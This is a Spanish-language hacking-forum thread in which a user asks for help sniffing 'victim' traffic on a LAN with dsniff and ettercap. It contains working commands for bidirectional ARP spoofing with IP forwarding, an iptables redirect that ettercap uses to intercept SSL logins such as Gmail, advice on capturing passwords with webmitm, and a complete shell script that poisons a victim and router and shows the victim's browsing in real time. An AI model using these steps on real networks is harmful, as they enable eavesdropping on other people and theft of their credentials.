Autor
|
Tema: Problema esnifando paquetes con dsniff en linux (Leído 6,068 veces)
|
neo444
Desconectado
Mensajes: 8
|
Hice un tema parecido hace unos dias pero me lo borraron cruelmente con la palabra BUSCA!!!, xD, así que eso he hecho, he avanzado un poco más pero sigo sin conseguir leer logs y tengo dos preguntas con este tema Tengo Linux Ubuntu y he hecho esto tanto usando la suite dsniff
192.168.1.1 puerta de enlace 192.168.1.2 víctima 192.168.1.3 víctima
-Con dsniff Abro 3 terminales: Código:
root@laptop:/home/usr/# echo 1 > /proc/sys/net/ipv4/ip_forward root@laptop:/home/usr/# arpspoof -i wlan0 -t 192.168.1.2 192.168.1.1
Código:
root@laptop:/home/usr/# arpspoof -i wlan0 -t 192.168.1.1 192.168.1.2
Código:
dsniff -i wlan0
Haciendo esto he de suponer que en la terminal me irán saliendo los paquetes que intercepte, pero no aparece nada, si uso: dsniff -i wlan0 -w log Entonces me crea ese archivo que veo que si ocupa espacio así que algo tendrá pero no puedo abrirlo, he leido en la doc. del dsniff que esos archivos son formato berkeley db, y me he bajado el src de berkeley, compilado e instalado, pero no se cómo abrirlo, así que esta es mi primera pregunta.
No he encontrado nada en internet que diga como abrir archivos berkeley db.
La segunda pregunta es que plugin para el ettercap necesito (tampoco encontré nada en internet), para que en la caja User messages me de users y pass directamente, sin tener que buscar en la conexión, ya lo instalé desde el código haciendo:
./configure --enable-plugins --enable-debug
pero me instala veinti tantos plugins, y según he leido por ahí debería tener más de treinta.
Y por último ahora sí que sí.
en el ettercap leí que para que interceptara contraseñas encriptadas en ssl, solo había que quitar el comentario de una linea del /etc/etter.conf, que el propio programa crea un certificado in the air, y lo manda al usuario cada vez que este intenta un envío SSL, esto me parecía tan simple y subrrealista que no me lo creí, y después de intentarlo no intercetó nada en páginas que se que usan SSL como GMail, esa linea es:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Me podeís explicar que hace exactamente esta linea
Gracias, y pediría que si alguna de mis preguntas es absurda (soy nuevo en esto), puede que otra no lo sea tanto, pero me gustaría que no cerrarais el post, gracias.
Todo esto lo hago con mi propia conexión a Internet con ordenadores de mi propiedad, simplemente quiero saber y aprender
|
|
« Última modificación: 16 Septiembre 2010, 19:33 pm por neo444 »
|
En línea
|
|
|
|
maverik35
Desconectado
Mensajes: 8
|
Hola neo..Lo estas haciendo bien..Redireccionas el trafico de la victima con ip_forward, esto para que no se corte la conexion de la victima...ya hiciste el envenenamiento de arps con el arpspoof en las 2 direcciones...Se captura bien tu info en Log..Pero a veces ese archivo trae un candadito, lo puedes vizualizar?..Solo cambiale los permisos con chmod 777 log.....O lo copias a otro directorio..Recuerda que el que crea el archivo es el propietario, pero al copiarlo, tu lo creas en esa nueva carpeta, y desaparece el candadito del archivo...Despues usa tcpxtract, descargalo desde repos o desde la pag. del autor...Si quieres hazlo desde repos (Synaptics o aptitude install tcpxtract, esto como root). Solo haz tcpxtract -f log -o NOMBRE_DE_ARCHIVO_DE_SALIDA Recuerda que tienes varias formas de snifear la red: Captura de Texto y Graficos: dsniff, tcpdump (mi favorito), wireshark, ettercap. Si lo haces a mano, como tu lo hiciste, con 3 terminales, haces tu envenenamiento de arps, y usas el tcpdump, o dsniff o wireshark desde linea de comandos..Si lo quieres con interface grafica, usa Wireshark, pero primero haz tu envenenamiento... dsniff es una suite, trae varios programas, webspy, mailsnarf, msgsnarf, webspy, etc..Una vez envevenado la victima, puedes usar todos a la vez, en varias ventanas... Si lo que quieres es snifear ssl (claves como gmail, yahoo, hotmail), lo haces a pie con linea de comandos o usas ettercap..Ettercap haces el envenenamiento de forma grafica..Yo prefiero a mano, configuras el archivo etter.conf y ya esta listo para ssl/TSL... Si vas a mano, usas las iptables, arpspoof y webmitm (parte del dsniff)... Saludos y suerte...
|
|
|
En línea
|
|
|
|
cocoswit
Desconectado
Mensajes: 10
|
Me hice este pequeño script que a mi me va fenómeno. Capturas el tráfico, arranca el firefox y te muestra en tiempo real las webs que está visitando la víctima. DescargaCódigo:
#!/bin/sh # sniff.sh # 22/11/2007 Created by CocoSwit # # sniff.sh is a sniffing web script for local-red # Copy, use it, modify, do what you want with, but under ALWAYS YOUR responsibility. # sniff.sh es un script para sniffing web en una red local # Copialo, usalo, modificalo, haz con el lo que quieras, pero SIEMPRE bajo TU responsabilidad. # La tarjeta de red es $3 , la Ip victima es $1 y la ip del router es $2 if [ $# -ne 3 ] then echo echo ERROR: faltan parametros echo echo Usa: $0 ip-victima ip-router tarjeta-red echo Ejemplo: $0 192.168.1.101 192.168.1.1 eth1 exit else # Activamos el ip_forward para poder reenviar el trafico a la victima echo 1 > /proc/sys/net/ipv4/ip_forward echo La tarjeta de red es $3 , la Ip victima es $1 y la ip del router es $2 # Ejecutamos en un terminal arpspoof entre la ip victima y la ip de la puerta de enlaze, mas otro arpspoof entre la puerta de enlace y la victima, arrancamos el firefox y capturamos el trafico. xterm -bg black -fg green -e arpspoof -i $3 -t $1 $2 & xterm -bg black -fg green -e arpspoof -i $3 -t $2 $1 & firefox & xterm -bg black -fg blue -e webspy -i $3 $1 fi
|
|
|
En línea
|
|
|
|
|
|